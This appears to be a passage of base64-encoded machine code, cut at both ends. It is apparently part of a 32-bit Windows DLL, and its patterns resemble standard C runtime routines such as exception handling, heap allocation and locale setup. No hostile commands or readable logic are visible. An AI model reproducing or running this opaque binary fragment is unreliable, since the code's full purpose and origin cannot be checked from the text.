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QuuCnABCJReSFwHQROQh1LItIBIlKBFDoQdX//1n/dgToONX//1mDZgQAx0X8/v///+gKAAAA6DHg///Di9DrxWoO6B7o//9Zw8zMzMzMzMzMzMzMzMzMi1QkBItMJAj3wgMAAAB1PIsCOgF1LgrAdCY6YQF1JQrkdB3B6BA6QQJ1GQrAdBE6YQN1EIPBBIPCBArkddKL/zPAw5AbwNHgg8ABw/fCAQAAAHQYigKDwgE6AXXng8EBCsB03PfCAgAAAHSkZosCg8ICOgF1zgrAdMY6YQF1xQrkdL2DwQLriIv/VYvsg30IAHUV6Gjz///HABYAAADolvj//4PI/13D/3UIagD/NSCgABD/FeBgABBdw4v/VYvsVot1CIX2D4RjAwAA/3YE6DLU////dgjoKtT///92DOgi1P///3YQ6BrU////dhToEtT///92GOgK1P///zboA9T///92IOj70////3Yk6PPT////dijo69P///92LOjj0////3Yw6NvT////djTo09P///92HOjL0////3Y46MPT////djzou9P//4PEQP92QOiw0////3ZE6KjT////dkjooNP///92TOiY0////3ZQ6JDT////dlToiNP///92WOiA0////3Zc6HjT////dmDocNP///92ZOho0////3Zo6GDT////dmzoWNP///92cOhQ0////3Z06EjT////dnjoQNP///92fOg40///g8RA/7aAAAAA6CrT////toQAAADoH9P///+2iAAAAOgU0////7aMAAAA6AnT////tpAAAADo/tL///+2lAAAAOjz0v///7aYAAAA6OjS////tpwAAADo3dL///+2oAAAAOjS0v///7akAAAA6MfS////tqgAAADovNL///+2vAAAAOix0v///7bAAAAA6KbS////tsQAAADom9L///+2yAAAAOiQ0v///7bMAAAA6IXS//+DxED/ttAAAADod9L///+2uAAAAOhs0v///7bYAAAA6GHS////ttwAAADoVtL///+24AAAAOhL0v///7bkAAAA6EDS////tugAAADoNdL///+27AAAAOgq0v///7bUAAAA6B/S////tvAAAADoFNL///+29AAAAOgJ0v///7b4AAAA6P7R////tvwAAADo89H///+2AAEAAOjo0f///7YEAQAA6N3R////tgg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